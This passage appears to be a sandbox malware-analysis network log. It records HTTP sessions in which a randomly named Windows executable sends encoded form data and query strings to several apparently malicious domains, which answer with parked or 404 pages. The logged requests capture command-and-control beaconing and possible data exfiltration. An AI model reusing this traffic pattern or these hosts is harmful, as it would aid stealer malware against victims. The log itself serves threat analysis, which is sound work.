                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:15.383615971 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:15 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.8 | 49735 | 209.74.95.29 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:17.337405920 CEST | 470 | OUT | GET /gfz9/?FvypB=88kTDXb8k4dH&Ux_TPFo=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.pofgof.pro
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:17.913590908 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:17 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Ascii: > <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a> </div>
                                                              Sep 25, 2024 09:17:17.913670063 CEST672INData Raw: 62 6f 64 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20
                                                              Data Ascii: body active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/hea
                                                              Sep 25, 2024 09:17:17.913675070 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74
                                                              Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md
                                                              Sep 25, 2024 09:17:17.913681030 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63
                                                              Data Ascii: </div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div>
                                                              Sep 25, 2024 09:17:17.913681984 CEST1236INData Raw: 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20
                                                              Data Ascii: </div> </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center">
                                                              Sep 25, 2024 09:17:17.913687944 CEST224INData Raw: 6c 61 73 73 3d 22 74 65 78 74 2d 77 68 69 74 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e
                                                              Data Ascii: lass="text-white mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3
                                                              Sep 25, 2024 09:17:17.918695927 CEST1236INData Raw: 22 3e 3c 2f 69 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d
                                                              Data Ascii: "></i>+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-socia


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.8 | 49736 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:23.027954102 CEST | 752 | OUT | POST /8lrv/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.donante-de-ovulos.biz
                                                              Origin: http://www.donante-de-ovulos.biz
                                                              Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=u0BgzfkYmwySWB5yRJZ7nABWFhdCANRL/ziTonH8fXPuL6jKgc/ZI4wpuR03bHYt9V5AUitdM/mCDGMKIGvD9udBJkJCZdHDCWWd/FbBcnKjLSFCE9BEZaXzzaRpUduh7VzUNeACels4LClkZ1rHfQjf62F1T8nn2Mk0rj6QIFru3gzH1cLdnBjxaW4zaa5A2viozeU=
                                                              Sep 25, 2024 09:17:23.497193098 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:23 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1150
                                                              x-request-id: 676f5bc7-2e1c-4bf4-b106-26d27f955fc8
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                              set-cookie: parking_session=676f5bc7-2e1c-4bf4-b106-26d27f955fc8; expires=Wed, 25 Sep 2024 07:32:23 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:23.497215033 CEST | 603 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjc2ZjViYzctMmUxYy00YmY0LWIxMDYtMjZkMjdmOTU1ZmM4IiwicGFnZV90aW1lIjoxNzI3MjQ4Nj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.8 | 49737 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:25.573515892 CEST | 772 | OUT | POST /8lrv/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.donante-de-ovulos.biz
                                                              Origin: http://www.donante-de-ovulos.biz
                                                              Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=u0BgzfkYmwySXgJyXqx7hgBVJBdCOdRH/z+TokKhcifuLbTKjZDZYowp6h0IGXYm9V01UiRdM/yCDEUKL1XM9+dDc0JMU9HDCWWd/FOscnyjLBdCFcBDaaXskqRpQdub7VzMNfcsenk4LDVkZkrEUQjV1WEeWMOoybk1h1WWJ07t2Wetv+DbkBLaaVQFftkosMyYtJAe9yr/k1LvWllAd74yH7nx
                                                              Sep 25, 2024 09:17:26.016503096 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:25 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1150
                                                              x-request-id: dc84e6cb-5268-4bf0-8cd8-3bdec397600c
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                              set-cookie: parking_session=dc84e6cb-5268-4bf0-8cd8-3bdec397600c; expires=Wed, 25 Sep 2024 07:32:25 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:26.016521931 CEST | 603 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGM4NGU2Y2ItNTI2OC00YmYwLThjZDgtM2JkZWMzOTc2MDBjIiwicGFnZV90aW1lIjoxNzI3MjQ4Nj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.8 | 49738 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:28.118437052 CEST | 1789 | OUT | POST /8lrv/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.donante-de-ovulos.biz
                                                              Origin: http://www.donante-de-ovulos.biz
                                                              Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]
                                                              Sep 25, 2024 09:17:28.590084076 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:28 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1150
                                                              x-request-id: f5bdd42b-e230-4a9c-a7a8-b28672aa7848
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                              set-cookie: parking_session=f5bdd42b-e230-4a9c-a7a8-b28672aa7848; expires=Wed, 25 Sep 2024 07:32:28 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:28.590131044 CEST | 603 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjViZGQ0MmItZTIzMC00YTljLWE3YTgtYjI4NjcyYWE3ODQ4IiwicGFnZV90aW1lIjoxNzI3MjQ4Nj


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              24 | 192.168.2.8 | 49739 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:30.661096096 CEST | 481 | OUT | GET /8lrv/?Ux_TPFo=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.donante-de-ovulos.biz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:31.111341000 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:30 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1530
                                                              x-request-id: 2d4cdb4c-7f86-4cc9-966a-5b882f54b984
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_agOEmzVAy+3VDoAd2cbpN/tvjyuDoiI8QwVT0ITzk9mMy9yNxx13LwY8OXKpxEqU5gjo7JYG2ZaOS4FGm9ALrw==
                                                              set-cookie: parking_session=2d4cdb4c-7f86-4cc9-966a-5b882f54b984; expires=Wed, 25 Sep 2024 07:32:31 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_agOEmzVAy+3VDoAd2cbpN/tvjyuDoiI8QwVT0ITzk9mMy9yNxx13LwY8OXKpxEqU5gjo7JYG2ZaOS4FGm9ALrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:31.111365080 CEST | 224 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmQ0Y2RiNGMtN2Y4Ni00Y2M5LTk2NmEtNWI4ODJmNTRiOTg0IiwicGFnZV9
                                                              Sep 25, 2024 09:17:31.111377001 CEST | 759 | IN
                                                              Data Ascii: 0aW1lIjoxNzI3MjQ4NjUxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG9uYW50ZS1kZS1vdnVsb3MuYml6LzhscnYvP1V4X1RQRm89ajJwQXd2TW1tQ3JZWlZoa2RzNVp2Q1pnT3lvdUVlb3E2aHUyczJUVVBoYllPb1hYOTlidU0rd3d4U0JnZlhjbXpFcHFUQ1ZBRk1DWlFuUXRDVmVMMGRSVllTUmpWZHIvQ2dqcW5XWFRFaW


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.8 | 49740 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:36.214409113 CEST | 731 | OUT | POST /i5ct/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.airtech365.net
                                                              Origin: http://www.airtech365.net
                                                              Referer: http://www.airtech365.net/i5ct/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=IYTY2LYjEEx/jzMUZWUpa0blRwzzxf/TP1qNe1sYdagQooCZPCffX/7OD8M87pCTTMjJ00F2N6sl/ZGAS6vMCItcVxwEL++Iwze6KunLHXJWzPnlUdeijHpOXM4FHpwIkHiRXpsl+H41QtWeaWMG8u3uJVBNli2/ADljXdHe3XUPysJAdPvtND2Ast0TzSaKrmEK6Zg=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.8 | 49741 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:38.759932041 CEST | 751 | OUT | POST /i5ct/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.airtech365.net
                                                              Origin: http://www.airtech365.net
                                                              Referer: http://www.airtech365.net/i5ct/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=IYTY2LYjEEx/jT8Ua18pNkbqaQzz7//XP1WNe2gIco0QxMOZODffHv7OXsM5jJCiTMmq02B2N6Il/Z2ASLvPDYtkTxwGP++Iwze6KuiQHXRWzf3lbf2h/XpJQM4FDpxPkHinXsMD+Fw1Qo6eZHMF3u3oNVAzky7dJhRCXcDH2UMbzakqHtnrODersucl2lHixFU6kO3yZ1h80jq+3FDRwpLnpl8M


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.8 | 49742 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:41.307147026 CEST | 1768 | OUT | POST /i5ct/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.airtech365.net
                                                              Origin: http://www.airtech365.net
                                                              Referer: http://www.airtech365.net/i5ct/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.8 | 49743 | 3.33.130.190 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:43.850404978 CEST | 474 | OUT | GET /i5ct/?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.airtech365.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:44.300858974 CEST | 414 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:17:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g=="}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.8 | 49744 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:17:57.664803982 CEST | 749 | OUT | POST /8q1d/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.longfilsalphonse.net
                                                              Origin: http://www.longfilsalphonse.net
                                                              Referer: http://www.longfilsalphonse.net/8q1d/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=YxM2bnsTaCCVCuzVjXl2a1apbQBE7dV/VTB3iYXHLSp0T+hwRJO/55LtXlQbl/kNmGtL9I1yoA1FbB+/01K9230+dL5uk7TjmoQGES9s5yzJnob6Uadmp2dj2SuY85YEY6sG0hiWMRXmDASMsWCrlm54jRvqJF8TL29t2VnlvCvx5o6FZUuWM3lB0tCrHr71I0Qgy8U=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.8 | 49745 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:00.214818001 CEST | 769 | OUT | POST /8q1d/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.longfilsalphonse.net
                                                              Origin: http://www.longfilsalphonse.net
                                                              Referer: http://www.longfilsalphonse.net/8q1d/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
